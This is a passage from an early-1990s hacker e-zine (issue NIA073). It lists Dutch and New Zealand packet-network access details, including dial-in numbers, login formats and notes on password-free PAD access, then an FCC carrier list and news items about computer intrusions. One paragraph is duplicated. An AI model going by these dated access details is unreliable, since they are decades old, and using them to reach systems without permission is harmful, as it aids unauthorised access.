(Customer Support) Support (Regional) Phone: (011.33.1)49112121 Hours of Operation: M-F 9:00am - 5:30pm Paris, France Contact: Trouble Reporting Center NETHERLANDS - BASIC GLOBAL CONNECTION SERVICE PTT Telecom BV Net. Name: DATANET-1 Telematics Systems and Services DNIC: 2041 P.O. Box 30150 2500 GD's-Gravenhage The Netherlands Contact: Telematics Services Tel. (31.70) 43.86.11 Mr. Peter Heuseveldt Tel. (31.70) 43.61.77 Fax (31.70) 43.76.05 (31.70) 43.75.67 Telex: (844) 30515 or 31111 OnTyme: INTL.DCTDATA 1. ACCESS/SPEEDS: Asynchronous dial-up 300, 1200, 1200/75 and 2400 bps Synchronous leased lines: 2400, 4800, 9600, 48000 bps 2. PROTOCOLS: X.25, X.28, X.75 Asynchronous terminal access. MNP protocol is supported with async speeds of 1200 and 2400 bit/s. 3. PRICES: All prices are in Dutch Florins (DFL). (1$ US = 2.08 DFL 7/88) 1. Permanent X.25 Connection a) X.25 Single Connection - Installation Charge 2400 bps (one logical channel) DFL 500.00 2400 bps DFL 500.00 4800 bps DFL 500.00 9600 bps DFL 500.00 48000 bps DFL 2000.00 64000 bps DFL 2000.00 - Monthly Subscription 2400 bps (one logical channel) DFL 235.00 2400 bps DFL 375.00 4800 bps DFL 575.00 9600 bps DFL 750.00 48000 bps DFL 2000.00 64000 bps DFL 2000.00 Extra logical channels for DFL 5.00 incoming and outgoing calls b) X.25 Multiple Port Connection Installation Monthly Charge Subscription 2400 bps DFL 1500,00 DFL 1100.00 4800 bps DFL 1500,00 DFL 1350.00 9600 bps DFL 1500,00 DFL 1550.00 Per extra pair of modems DFL 175.00 c) Traffic Charges to the USA Connect Time - per minute DFL 0.25 Transmission - per segment DFL 0.0125 Call set-up - per call DFL 0.06 2. PAD Connection a) Monthly subscription per NUI DFL 30.00 b) Traffic Charges to the USA Connect Time - per minute DFL 0.25 Transmission - per segment DFL 0.015 Call set-up - per call DFL 0.06 c) Telephone Charges DFL 0.15 per 5 minutes. Telephone charges are billed separately. Service Lead Times: One week delay to obtain an NUI. 4. COMMENTS: PAD Connection: It is possible to communicate via the PAD in 2 ways: - identified, this means that you need a PTT identifier and a password ; - unidentified, you use no threshold access for which no identifier or password is required. The communication costs are charged to the Host and the user does not need a subscription to the PAD, a form of an electronic answer number is created for the users. --------------- OPERATIONAL/TECHNICAL INFORMATION------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Contact: PTT - Datacommunications Hours of Operation: 24 Hours/7 Days Phone: (31) 2159 36604 Telex: (844) 43198 DACOM NL Fax: (31) 2159 17393 2. SERVICE INFORMATION ADDRESS: 20412900090 3. TEST ADDRESS: Echo: 2041900 4. ASYNC ACCESS PROCEDURES: LOGON: 1. On modem connect you will recieve the msg: TER 2. Login string: A;1;;;03106xxxxxx[P|DCUD] ^ ^ optional CUD __|______| 5. TYMUSA AVAILABLE: Yes (Please contact your sales representative for additional information and access numbers) 6. DEFAULT PAD SETTING: 1:1, 2:1, 3:2, 4:0, 5:0, 6:5, 7:21, 8:0, 9:0, 10:0, 11:x 12:1, 13:0, 14:0, 15:1, 16:127, 17:24, 18:18, 19:0, 20:0 21:0, 22:0 PAD Profiles: Interactive 1 PROF 10 = 1:1, 2:1, 3:2, 4:0, 5:0, 6:5, 7:21, 8:0, 9:0, 10:0, 11:x, 12:1, 13:6, 14:0, 15:1, 16:127, 17:24, 18:18, 19:2, 20:0, 21:0, 22:0 Transparent/File Transfer/Block Mode PROF 91 = 1:0, 2:0, 3:0, 4:20, 5:0, 6:0, 7:2, 8:0, 9:0, 10:0, 11:x, 12:0, 13:0, 14:0, 15:0, 16:127, 17:24, 18:0, 19:1, 20:0, 21:0, 22:0 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: City/Territory V.21/300 V.23/1200/75 V.22/1200 and 2400 MNP --------------------------------------------------------------------- REGION 1 ALKMAAR (072) 624814 624814 624814 AMERSFOORT (033) 620492 620492 620492 AMSTERDAM (020) 460031 460031 460031 of (020) 6680531 6680531 6680531 HAARLEM (023) 358324 272134 276284 LELYSTAD (03200) 62040 62040 62040 UTRECHT (030) 310032 340414 321114 REGION 2 ARNHEM (085) 432778 432778 432778 DEVENTER (05700) 42011 42011 42011 EMMEN (05910) 42600 42600 42600 GRONINGEN (050) 143666 143555 143777 HENGELO (074) 438355 438555 438255 LEEUWARDEN (058) 128986 129188 129382 MAASTRICHT (043) 434900 434020 435700 NIJMEGEN (080) 600101 600015 600204 VENLO (077) 544411 544411 544411 ZWOLLE (038) 221133 221133 221133 REGION 3 BREDA (076) 227032 227040 226525 DORDRECHT (078) 310811 310811 310811 EINDHOVEN (040) 456345 440085 454585 GOES (01100) 31006 31006 31006 HERTOGENB. (073) 890840 890840 890840 ROTTERDAM (010) 4140877 4334211 4045377 TILBURG (013) 365440 365440 365440 ZOETERMEER (079) 214092 212001 521547 --- NEW ZEALAND --- NEW ZEALAND - BASIC GLOBAL CONNECTION SERVICE Last Update: June 29, 1990 Net. Name: PACNET Telecom Networks and International Ltd. DNIC: 5301 Telecom Networks House Switched Data Network Section 68-86 Jervois Quay P.O. Box 1092 Wellington 1, New Zealand Contact: Alan Townsend Phone: (64.4)496 6132 Telex: 791 31688 Fax: (64.4) 496 6125 1. ACCESS/SPEEDS: Dial-up: 300, 1200, 1200/75, 2400 Leased Line: 300 and 1200 bps asynchronous Leased Line: 2400, 4800 and 9600 bps synchronous 2. PROTOCOLS: X.25, Asynchronous terminal interface 3. PRICES: All prices are in New Zealand Dollars. (NZ Dls) (1$ US = 1.7 NZ Dls. 7/90) Traffic Charges to the USA: Time: NZ 12.00/hr Volume: NZ 12.00/ksegment Minimum Charge: For successful call: 6 segments For unsuccessful call: 2 segments Dial-Up Service: Registration Fee: NZ 18.18 (one time) Monthly Charge: NZ 5.00/NUI Leased Line Service: Async Connections: Installation Charge Monthly Charge 300bps NZ 240.00 NZ 190.00 1200bps NZ 280.00 NZ 255.00 Synchronous Connections: Installation Charge Monthly Charge 2400bps NZ 280.00 NZ 160.00 4800bps NZ 280.00 NZ 170.00 9600bps NZ 280.00 NZ 190.00 48kbps NZ 1680.00 NZ 660.00 ============================================================================ / / / NIA073 / File 05 / / Report On Interexchange Carriers / / Compiled By The FCC / / / The following list outlines all Long Distance carriers purchasing switched access as of March, 1991. The list also outlines the type of access purchased. With feature group A and B, the caller gains access to the carrier's facilities by first dialing a remote access site. Feature group D indicates equal access. SERVICE ACCESS TYPE ------------------------------------------------------------- 10 Plus Teleservices D Abcom A ACC Long Distance Corporation A B D Access Long Distance B D Access Plus A D Action Telecommunications Co. A B D Advanced Business Telephone, Inc. A B D Advanced Communication Technologies, Inc. A B D Advanced Communications Systems, Inc. A B D Advanced MKG, SVCS., dba Dial Anywhere A B D Aero Mayflower A Afford-A-Call A B D Allnet Comm. Svs., Inc. (LDX, Lexitel) A B D Altcom Corp. A Alternate Communication Technology, Inc. B D A.B.E. of Alabama, Inc., dba Econoline A Americall Corporation (Calif.) A B D Americall Systems of Louisville A B D American Long Distance Co. D American Long Distance Exchange, Inc. D American Long Lines A B D American National Telcom A B D American Network Exchange, Inc. A B D American Sharecom, Inc A B D American Telco, Inc. A B D American Telco Network Services, Inc. A B D American Telecommunications Holdings, Ltd. B D American Telesystems A B D Amerisystems, Inc B D Amvox D Ascom Autelca A Associated Telenet, Inc. A B D Associated Terminating Network A ATC A B D Atlantic Connection, Ltd. A ATX Telecommunications Services A B D AT&T Communications A D Austin Bestline A B D Automated Communications, Inc. B D Bay Communications A B D Bittel Telecommunications Corp. A B D Biz Tel Long Distance Telephone Co. D Biztel, Ltd. A B Bi-State Telephone Co. A Budget Telephone A Burlington Telephone Company A B D Business Communications Network, Inc. D Business Telecom, Inc. A B D Cable & Wireless Communications, Inc. (TDX) A B D Call America A B D Call America Business Comm. Corp. A B D Call America of Riverside A B D Call America/Palm Desert A B Call Savers of Fresno B D Call Technology Corp. of Philadelphia B D Call USA Corp. B D Call-USA, Inc. B Cambridge Communications A B D Cam-Net, Inc. A B D Capital Network System, Inc. A B D Capital Telecommunications, Inc. A B D Card*Tel A Centel Net D Central Lines A Central New York Talk-Transit A B Central Teleohone Systems, Inc. A B Central Texas Long Distance, Inc. A B D Century Area Long Lines A Century Network, Inc. A B Chadwick Telephone A B D Charter Corporation dba TRI-J A B D Charter Network A B D Chautauqua Tele-Saver A Checkrite A B Chicago Communications Services, Inc. A Cincinnati Bell Long Distance, Inc. B D Citynet Communications, Inc. B D Cleartel Communications B D Clifton Phone Systems D Coachella Valley Communications B D Coastal Telephone Company B D Colorado River Communications B D Com Systems Network Services A B D Comantel A Commander Systems, Inc. A Communication Cable Laying Co., Inc. A B D The Communigroup of N. Alabama A Communique Telecommunications, Inc. D Compu-Tel, Inc. A Com-Mar, Inc. A Conagra A Conifer Communications, Ltd. A B Conquest Communications Corporation B Conquest Long Distance Corp. A B D Conquest Operator Services Corp. B D Consolidated Network, Inc. B D Consortium Communications Inc. A Contact America A B D Contel ASC A B Continental Switching Corporation D Continental Telecommunications Group D Cont'l States Corp. dba TMC of Orlando D Coshocton L.D.S. A B CTI Telecommunications, Inc. A B D Custom Telecom. Network of Arizona D Cypress Telecommunications Corp. (CYTEL) A B D Dash Long Distance Service, Inc. A B D Data General Network Services A Datanet Communications, Inc. A B D Decco A Delta Communications, Inc. A B D Dial America, Inc. A B Dial-Net, Inc. A B D Digital Network, Inc. A B D Digital Signal, Inc. A Direct Communications, Inc. A B D Discount Communications Services A B Dunset A E & K Systems, Inc. A Eastern Microwave D Eastern Telelogic Corporation A D Eastern Telephone Systems, Inc. A B D Econo-Call, Inc. A B Econo-Line (Harrison, AR) B Econo. Call Long Distance Services A B D Econ-A-Call, Inc. of Heys A B D EDS A B Equicom Communications, Inc. B D Escondido Telephone Company B D Execuline of Sacramento A B D Execuline of the Northwest A B D Execulines, Inc. A FEB Corporation D Fiberfone of Florida, Inc. A B Fibernet Communications Corporation B D First Communications, Inc. (FDR) B First Data Resources, Inc. (FST) B D First Fone of Amarillo B D First Fone Long Distance B D First Interstate Service Co. B First Phone of New England A B D Flat Rate Communications B Flex Communications System A B D Fone America, Inc. A B D Fones West A Fox Communications Corp. B D Garden State Long Distance Telephone A D General Communication, Inc. A B D GEO Communications, Inc. A Glen Falls Long Distance Service A B GMW Company A B D Hart Communications Co. D Hi-Plains NTS Communications B Icon Communications, Corporation A B D Independant Long Distance D Indianapolis Telephone Corp., Inc. A Innovative Communications, Inc. B D Intelco A B D Inter Tel A International Pacific B D Internationsl Telecharge, Inc. A B D Internet Datacom, Inc. A Interstate Telephone Company A B Iowa Network Services, Inc. B D ITC Networks A B D J-Net Communications, Inc. A B D Kawahawi Company A KCC Communications D Ken-Tel Service, Inc. A B D Kentucky Telephone Corp. A B D Key System Corporation A Keystone Telecommunications, Inc. A B D Lake States Communications, Inc. D Lassman - Weber Communications, Inc. A B D LDB Corporation A B D LDDS A B D LDS of Alexandria B D LDS of Baton Rouge A B D LDS of Monroe A B D LDS of Shreveport A B D LDS of Tulsa A B D Lintel Sys. dba Lincoln Telephone L.D. B D Litel Telecommunications (Lightcall) A B D Lone Star Telecom D Long Distance Communications B D Long Distance Discount, Inc. A B D Long Distance for Less A B D Long Distance Management A B D Long Distandce Network, Inc. A D Long Distance Ohio, Inc. A B Long Distance Savers A B D Long Distance Service, Inc. A B D Long Distance Specialties Telephone Co. A B D Long Distance Telephone Savers, Inc. A B D Long Line Inc. A LTS, Inc. A B D Lufkin Tele. dba Star Tel of Lufkin A B Manitowoc Long Distance Service A D Marinette-Menominee LDS A B D Marshall LDDS A MCI A B D Metromedia/ITT A B D Metro Telephone, Inc. B D Metronet Long Distance Communications A D Mid Atlantic Telecom A B D Mid Atlantic Telephone Company A Midamerican Comm. (Midamerican L.D.) A B D Midco Communications A B D Midcom, Inc. B Midcom of Arizona, Inc. A D Midco-Tel of Aberdeen A Midwest Telephone Service, Inc. A B D Mid-Tel L.D., Inc., of Williston A B Minntelco A Mobile Comms., Corp. of America A Montana Long Distance, Inc. B D MSI Communications, Inc. B Nacogdoches Telecommunications, Inc. A B D NACT dba Network Telemanagement Services A B NAPA Valley Telecom Services A B D National Brands, Inc. B D National Network Corp. B National Technical Association dbs NTA B D National Telecommunications, Inc. A B D National Telephone Communications, Inc. A B National Telephone Exchange (N.Y.) A B D National Telephone Exchange (PA) A B National Telephone Exchange (TX) A B D National Teleservice A B D National Tele-Sav, Inc. B D NCHE Telecommunications Network, Inc. D Net Express Communications, Inc. D Netech Communications A B D Network 1, Inc. A B Network Communications, Inc. A Network Operator Services, Inc. B D Network Services, Ltd. B D Network Telecommunications A B D Network Telephone Services, Inc. D Nickle Fone A B D Norlight A North American Communications, Inc. A B D Northern Arizona Communications Corp. B D Northern Michigan L.D.S. A B Northern Wisconsin L.D.S. D Northland Telephone Systems, Ltd. A B D Northwest Network Communications, Inc. A B D Northwest Telecom, Ltd. A B D Northwest Telecomm, Co. A B D Novah of Michigan A NTS Communications, Inc. A B D NY Com, Inc. B D One Call Communications, Inc. A B D One-2-One Communications A B D Operator Service Company D Pace Long Distance Service A B D Page America Communications, Inc. A Panda Communications A Pass Word, Inc. B Payline Systems, Inc. B D Peninsula Long Distance Service, Inc. A D Penny Fone A B Petroleum Communications A Phoenix Communications Group, Inc. A B D Phoenix Network Corporation B D Phone America of Carolina A B D Phone Base Systems, Inc. D Phone One A B D Phonelink, Inc. A Phonenet, Inc. A Phonetel Technologies, Inc. D Pilgrim Telephone, Inc. D Prestwood Communications Co. A Professional Networks Management, Inc. A B D Pro-Com, Inc. A B D PSA, Inc. A B Qwest Microwave Corp. B Radius Telecommunications A RCI Long Distance A B D Resurgens Telecommunications D Roamer Services, Inc. D Rochester Telecomm Systems A San Marcos Long Distance, Inc. B Schneider Communications A B D Science Dynamics Corporation D Securitex dba Tylernet Long Distance A B D Sharecom A D Shared Use Network, Ltd. A B D Shared Use Network Service, Inc. A B D Shenandoah Long Distance Company B Sierra Telecommunications, Inc. B D SM Long Distance B D South Bay Communications, Inc. A B South Tel A B D Southern Interexchange Services, Inc. B Southnet Services, Inc. D Southwest Communications B Spectratel A St. Thomas & San Juan Telco, Inc. A Star Tel A B Star Tel of Abilene A B D Star Tel of Victoria A B D Star Tel Transmission Co., Inc. A B D Starline, Inc. B D Startec, Inc. D St. Joe Communications, Inc. D Sun Coast Comm Inc. A Sunshine Telephone, Inc. A B D Superior Telecom A B D Swiff Train Communications A B Switchboard of Oklahoma City A B Tacoma Telephone Exchange A Taconic Long Distance Service, Corp. A B D TCS Network Services A TEC West A Tel America, Inc. A B D Tel Com International, Inc. B D Tel Systems Management A Telamarketing Communications, Inc. A B D Telamarketing Communications of America D Telamarketing Communications of Arkansas A B D Telamarketing Communications of Bakersfield A B Telamarketing Communications of Baton Rouge D Telamarketing Communications of Birmingham A D Telamarketing Communications of Columbus A Telamarketing Communications of El Paso A D Telamarketing Communications of Evansville A B D Telamarketing Communications of Fresno A B Telamarketing Communications of Lafayette A D Telamarketing Communications of Louisville A D Telamarketing Communications of Milwaukee A B D Telamarketing Communications of Nashville A Telamarketing Communications of NW Indiana A Telamarketing Communications of Oklahoma A D Telamarketing Communications of Omaha A B D Telamarketing Communications of Piedmont A B D Telamarketing Communications of Providence A B D Telamarketing Communications of Raleigh A Telamarketing Communications of San Luis Obispo A B Telamarketing Communications of Savannah A Telamarketing Communications of Stockton A B Telamarketing Communications of Tri-States A B D Telamarketing Communications of Tulsa A D Telco of Baton Rouge, Inc. A B D Tele Tech, Inc. A B D Telecolumbus, USA dba Worldcom D Telecommunications Services Corporation A B D Telecommunications Consultants, Inc. B D Telecon Communications Corporation B Teledial America A B D Telefind Corporation B Telemanagement Consultants Corporation A B D Telenational Communications A B D Telephone Assoc., dba Fergus Falls LD B Telephone Assoc., dba Thief River Falls LD D Telephone Assoc. Long Distance SVCS. A B D Telephone Communications Corporation A D Telephone Connections, Inc. B Telephone Express A B D Telephone Express, Inc. A Telephone Systems A B Teleport Communications A Telepro dba Blue Ridge Telephone Company A B D Telesavers, Inc. A Telescan, Inc. B D Telesphere Network, Inc. A B D Telesphere of Houston B Tele$aver of New Mexico B D Tele-Fibernet Corporation A B D Tele-Sys, Inc. A B D Teltrust Network Service A B D Telvue Corporation B D Tel-America Network Services, Inc. A B D Tel-A-Save Communications Systems, Ltd. A B Tel-Central of Jefferson City A B D Tel-Com, Inc A B Tel-Share A B D Tel-Toll dba Econ-O Dial of Bishop A B Texas Long Distance Conroe A B Texustel, Inc. A B D The Communigroup A B D The Offshore Telephone Company A B The Pay Telephone Company B D The Switchboard A B Things, Inc. A B D Thrifty Telephone Ex. dba Ohio Digital Access B D TK Communications, Inc. A B D TMC of Lexington A B D TMC of San Diego A B D TMC of Southern Kentucky B D TMC of Southwest Florida A B D TMC of Washington, DC A B D Total-Tel USA, Inc. A B D Touch America, Inc. B D Touch-1 D To-Tel Comm Sys A Transamerica Telecommunications, Inc. A B D Transtel Comm Express Tel A Trans-Net, Inc. A B D Tri-Tel Communications A B D Tri-Tel Comunications Systems A B TRT Telecommunications Corporation A B D TTE of Charleston A D TTI Midland-Odessa B D Tuck Data Communications B Tyler Telecom A B D Tymnet A B T-Tel A B D United Comunications, Inc. B D United Telephone Co. dba Telamerica L.D. A B D United Telephone Long Distance D Unitel A D Universal Telephone Systems B D U.S. Link A B D U.S. Long Distance, Inc. D U.S. Sprint [Isacomm, Telenet, LD/USA] A B D U.S. Tele-Comm, Inc. D Valley Star-Tel A B D Valley Wats A B D Valu-Line of Amarillo A B D Valu-Line of Angletown A Valu-Line of Kansas, Inc. A B Valu-Line of Longview, Inc. A B D Valu-Line of of St. Joseph A D Valu-Line of of Wichita Falls A B D Vartec National, Inc. A B D Vertelco Systems A B Virtual Network Services Corp. A B D Vista-United Telecommunications A Vortel Communications, Inc. A B D VTA, Inc. D VYVX Telecom, Inc. A B D West Coast Telecommunications, Inc. A B D Westcom Data Tel A Westcom Long Distance A B Westel, Inc. A B D Westel Communications (Telamarketing Comm) A B D Western Express Communications, Inc. A Western Information Systems, Inc. A B Western Oklahoma Information Systems A B D Western Telenet, Inc. A D WI Amer Sharecom Inc. A Wiles Communication Service B D Williams Telecommunications Group A Wisconsin L.D.S. B D Wylon A B D Yavapai Telephone Exchange A B D ------------------------------------------------------------- ============================================================================= / / / NIA073 / File 06 / / Vox Populi: / / NIA News / / / --- Date: July 22, 1991 Source: AT&T Newsbriefs C. Sources: San Fransisco Chronicle (7/20/91), Dallas Times Herald (7/20/91) A prankster who intercepted and rerouted confidential telephone messages from voice mail machines in City Hall prompted officials to pull the plug on the phone system. The city purchased the high-tech telephone system in 1986 for $28 million. But officials forget to require each worker to use a password that allows only that worker to retrieve or transfer voice messages from their "phone mailboxes," said AT&T spokesman Virgil Wildey. As a result, Wildey said, someone who understands the system can transfer messages around, creating chaos. --- Georgia's New Area Code Date: July 1991 Source: Southern Bell Customer Newsletter Telephone use in Georgia has increased so rapidly -- caused by increased population and the use of services like fax machines and mobile telephones -- that we are running out of telephone numbers. Southern Bell will establish a new area code -- 706 -- in Georgia in May 1992. The territory currently designated by the 404 area code will be split. Customers in the Atlanta Metropolitan local calling area will continue to use the 404 area code. Customers outside the Atlanta Metropolitan toll free calling area will use the 706 area code. The 912 area code (South Georgia) will not be affected by this change. We realize the transition to a new area code will take some getting used to. So, between May 3, 1992 and August 2, 1992, you can dial EITHER 706 or 404 to reach numbers in the new area. After August 2, 1992, the use of the 706 area code is required. We are announcing the new area code far in advance to allow customers to plan for the change. --- Countywide Calling For Southern Bell Customers Date: July 1991 Source: Southern Bell Customer Newsletter As required by legislation enacted by the Georgia General Assembly and by order of Georgia Public Service Commission, beginning July 1, 1991, you will be able to make calls within your county free of toll charges. On July 1, calls within your county boundary that were previously long-distance calls are now local calls. Therefore, no itemization or toll charges will appear on your telephone bill for calls within your county. If you currently use the "1" plus 10-digit dialing or "1" plus seven-digit dialing, you should continue that same dialing pattern with the implementation of countywide calling on July 1. In addition, you can obtain a telephone number within your county by dialing 411 for Directory Assistance with applicable charges applying to these calls. --- Some Bellcore Acroynms Source: Telecom Digest BCR Bell Communications Research FCIF FACS Component Interface Format * (FACS = Facility Assignment and Control System *) LUSI Local User System Interface NMA Network Monitoring and Analysis System RUSI Remote User System Interface SCCS Switching Control Center System * SEAS Signaling Engineering and Administration System * SOP Service Order Processor * SSP Service Switching Point * TOP Transactions-Oriented Protocol * UPL User Program Layer USL User System Language * = belongs to Bellcore --- Source: United Press Wire BALTIMORE (UPI) -- Chesapeake and Potomac Telephone Co. wants to expand its Caller ID system to businesses with centrex systems. C&P has submitted a plan to the Public Service Commission that would allow any business with three or more lines to buy Caller ID. The service, which permits users to obtain the numbers of incoming calls, has been available in Maryland since October, 1989. So far, Caller ID mainly has been marketed and sold as a service for residential and small business customers. It also has been available to large businesses with PBX switchboards on a special-order basis. But the service has not been widely available to C&P's 11,000 business customers with centrex. Centrex are large-scale telecommunications systems that can handle anywhere from three to 10,000 or more telephone lines. --- Teenage Hacker Emulates Hess Source: Summarised from Computer Weekly Date: 8th August 1991. A 16 year old schoolboy named Jamie Moulding has been cautioned by plain-clothed police after hacking into a military computer and trying to sell secrets to the USSR. He claims to have read the Ministry of Defence personnel and payroll files. One computer he entered held details of a British Army tank control system. Moulding first incorporated details of the system into his own simulation package, and then phoned the Soviet Union's London embassy to try to sell the information. Next day two policemen turned up at his home and spoke to his parents. Moulding's telephone bills were unwittingly paid by his school. He wrote an autodialer program and an automatic hack program which "planted a command which led to a display of passwords". DEC denied that its systems had been hacked. The police officers were unavailable for comment. --- Electronic Mail Beams Shuttle's Message Home By Joe Abernathy and Mark Carreau Source: Houston Chronicle, Page 1A, Copyright 1991 Date: August 5th, 1991 Electronic mail networks, the message medium of the information age, made their debut in the space age Sunday aboard the shuttle Atlantis as part of an effort to develop a communications system for a future space station. Details of the test were being closely guarded because of concerns over a possible hacker incident or "public free-for-all" on the nation's computer networks, according to one engineer involved with the project. Privacy and medical ethics also loom large as issues. [...] Electronic mail offers a new way for astronauts to stay in touch with their families, Mission Control, and potentially, the millions of people who use the nation's interlinked computer networks. It could produce far-reaching change in the way scientists and others interact with the space program. Currently, only the shuttle communicator is allowed to talk with the astronauts during a flight, except for a private medical conference each day. E-mail could change that by letting any number of people exchange information, while scientists and engineers on the ground could assume direct control over their experiments in space. [Bryon] Han and fellow Apple employees Michael Silver and James Beninghaus have donated their time to the project. They are using low-cost, commercially available products, rather than the costly custom products often used in science. [!!!] The e-mail will play a role in controlling experiments, electronic flight information, and transfer of experiment results to the ground, Han said, as well as sending data up to the shuttle. In the future, the system might be used to transmit and manipulate information from the many medical experiments NASA conducts. But this raises a number of problems regarding privacy and medical ethics. For example, one experiment in this flight seeks to correct a blood-flow problem associated with weightless ness that causes some astronauts to faint upon their return to Earth. But this experiment is being monitored with the same Apple computer that is playing host to the e-mail system. Even though the results aren't being transmitted over computer networks this time, they might be next time -- and computer networks are notoriously insecure. Inquisitive computer enthusiasts -- hackers -- are in fact one of NASA's chief concerns in regard to the use of electronic mail. The space agency initially sought to conduct the tests without publicity, but word quickly percolated around the nation's computer networks -- perhaps indicating that the concerns were justified. A chorus of calls was heard requesting the e-mail address of the astronauts -- but that raised another problem more pressing than any threat from malicious hacking, that of capacity. "We have things we need to accomplish with the limited amount of time we have, and we do have a very limited amount of data we can move between Mission Control and the orbiter," said Deborah Muratore, an engineer in the space station support office at Johnson Space Center and the experiment manager. In addition to voice communication, the shuttles are equipped with Teletype and fax machines for the transmis sion and reception of printed material and even photo graphs. "Conceivably, everything they move that way could be moved from computer to computer," Muratore said. "From a space station standpoint it would be much preferable to transfer the information electronically without paper in the loop the way we do today on the shuttle." "Paper is going to be a limited resource, something that has to be thrown away or reused on the space station," she said. "It becomes trash. So the more we can eliminate on the space station the better off we are." The current experiment does not represent the first time that civilians have had a direct communications link with those in space. Since January, the Soviet space station Mir has maintained a "mail drop" for ham radio operators to use in leaving messages for the cosmonauts. "It's very similar" in function, said Gary Morris, a former member of the Johnson Space Center Amateur Radio Club who now lives in San Diego. "The packet bulletin board system on Mir allows an amateur (ham radio operator) on the ground to leave mail messages. "What they're doing with the Mac is different in that they're going through the whole (electronic mail) network. It's much more complex." --- Pentagon computer cracked by teen-age hacker in Israel Source: Houston Chronicle News Service KARMIEL, Israel -- An 18-year-old computer whiz gained access to a Pentagon computer and saw US military secrets in his home during the gulf war, police said friday. The hacker, identified as Deri Schriebman, was placed under house arrest Thursday after police searched his home in the northern Israeli city of Carmiel. Police have not heard from US authorities on the security aspects of the case, said Galilee Region Police Commander Rami Rav. "The way he cracked the Pentagon computer should certainly interest them. He was able to look at classified material during the gulf war, especially at one very sensitive project which is also connected to Israel," Rav told Reuters. Schriebman, already a graduate of Israel's Technion University, also built equipment to place international telephone calls free of charge, bypassing the computers of Israel's telephone company. Police said he also obtained the names of holders of Visa cards, passing the information to other computer "hackers" in North America, who were arrested after yearlong buying sprees. Police are investigating the case and have not yet said whether they will press charges. But Rav said the youth did not benefit from the Visa fraud. "Everything he did was out of curiousity...he made no profit from it, neither from the Visa cards nor from the sensitive security information." --- Subject: CIA dumps on the National Security Archive The National Security Archive (NSA), a non-profit clearinghouse for Freedom of Information Act (FOIA) materials, requested from the Central Intelligence Agency (CIA) a list of materials that the CIA had released under the FOIA. The CIA responded to the request by producing "a random dump", 5000-pages long summarizing the released material. The NSA and the CIA are frequently at odds with each other, hence the "hostile" reply by the CIA. Under the FOIA, agencies are not required to create (i.e. organize, sort, or merge) data, merely to provide information that already exists. So, it is unlikely that the NSA would have any recourse other than to attempt to reconstruct the index from the info-garbage it was given. [Common Cause 17(4): 20 (1991)] --- Subject: CAA grant Cat IIIB autoland clearance for 747/76 In the September 19th Rolling Stone at page 67 an article titled "Samurai Hackers" by Lynda Edwards tells us that a: "new breed of hacker has been finding a niche in the corporate world in the last two years. These hackers are hired by white-collar professionals at ad agencies, law firms, newspapers, and investment houses who want to steal co-workers' ideas and clients or pillage supervisors computer files for marketing strategies, performance evaluations and managerial gossip." Ms. Edwards presents several tales of crackers hired by unethical people in business to snoop in or sabotage other peoples' computer files. She also describes how victims sometimes hire their own crackers to mount a counter-attack. The crackers use their knowledge and skills to ferret out information from companies' networks and minicomputers. They usually receive a leg up from their employers, who get them modem 'phone numbers and basic account/password info. The crackers then overcome or bypass the often trivial security on the target systems. Most of what they do could be done by any jackleg expert with a given system, but the crackers are the agents of computer Ms. Edwards presents several tales of crackers hired by unethical people in business to snoop in or sabotage other peoples' computer files. She also describes how victims sometimes hire their own crackers to mount a counter-attack. The crackers use their knowledge and skills to ferret out information from companies' networks and minicomputers. They usually receive a leg up from their employers, who get them modem 'phone numbers and basic account/password info. The crackers then overcome or bypass the often trivial security on the target systems. Most of what they do could be done by any jackleg expert with a given system, but the crackers are the agents of computer illiterates and thus constitute a threat unconsidered by the managers of systems in non-computer businesses. These crackers are seen to be somewhat akin to the wandering samurai of Japan's past. They work as mercenaries, honing their own skills and testing them in combat on behalf of employers they often hold in contempt. (The crackers are said to refer to ignorant computer users as "Stupids.") The samurai image is distorted and romanticized but the jobs the crackers take on are very real. These crackers are well paid by those who hire them through bulletin boards or by word-of-mouth. Tales of their exploits circulate on BBS's and they are getting some notice in 2600 magazine. --- Subject: Computer Security Breach at Rocky Flats Nuclear Weapons Plant Date: September 16, 1991 AP writer Steven K. Paulson reports on 9/16/91 that security lapses at the Rocky Flats nuclear weapons plant included the storage of top-secret bomb designs for a week on a VAX accessible from the public phone network. In other instances, workers transferred classified working materials from secure computers to lower security ones, including PCs, because they were tired of constant changes in the secure systems and wanted to work on familiar [stable?] systems. Head of DOE operations at Rocky Flats Bob Nelson said that the agency started last year a $37M program to correct security problems, following the recommendations of outside security experts. Nelson also said that the unclassified VAX was used by employees working from home, but that if someone tries to break in ``bells and whistles go off'' [is he so sure???] According to other documents obtained by the AP, other DOE computers had been found to be vulnerable to break-ins. --- Subject: Denver Hacker Hacks NASA Source: The Denver Post, Denver & The West section p. 1 Date: 9/25/91 NASA vs. hobbyist: Computer whiz accused of illegal access, mischief By. Peter G. Chronis Denver Post staff writer An Aurora computer hobbyist who allegedly used a personal computer and his home phone to penetrate NASA computers hacked off Uncle Sam enough to be indicted on seven federal counts yesterday. Richard G. Wittman, 24, the alleged "hacker," was accused of two felonies, including gaining unauthorized access to NASA computers to alter, damage, or destroy information, and five misdemeanor counts of interfering with the government's operation of the computers. Wittman allegedly got into the NASA system on March 7, June 11, June 19, June 28, July 25, July 30, and Aug. 2, 1990. Bob Pence, FBI chief in Denver, said Wittman used a personal computer in his home and gained access to the NASA systems over telephone lines. The investigation, which took more than a year, concluded that Wittman accessed the NASA computer system and agency computers at the Marshall Space flight Center in Huntsville, Ala., and the Goddard Space Flight Center in Greenbelt, Md. The NASA computers are linked to a system called Telenet, which allows qualified people to access government data bases. A user name and password are required to reach the NASA computers. Federal sources declined to reveal more information because the complex case involves "sensitive material." Wittman, a high-school graduate, apparently hadn't worked in the computer industry and held a series of odd jobs. The felony counts against him each carry a possible five-year prison term and $250,000 fine. --- Source: NewsBytes According to a news release from {NewsByte}, direct international dialing is now available from Moscow from 0000-0900 each day. Local analysts say the reason for the start of direct-dial service is that a second international phone exchange, originally scheduled to start six months ago, has finally been launched. To dial international numbers from Moscow, one must dial 8, then wait for a second dial tone, dial 10 + country code + city code + phone number. --- Subject: Company Dares Computer Intruders to Hack Away Source: The Detroit News, Sunday, Aug. 4, p. 3A It's a little like inviting robbers to knock over your bank. To prove its computer programs are secure from electronic intruders, Unix System Laboratories wants hackers to try to break in. The company set up an unattended test computer at its headquarters in Summit, N.J., and bets that unauthorized users can't get into its mock payroll accounts, can't cut phony checks and can't 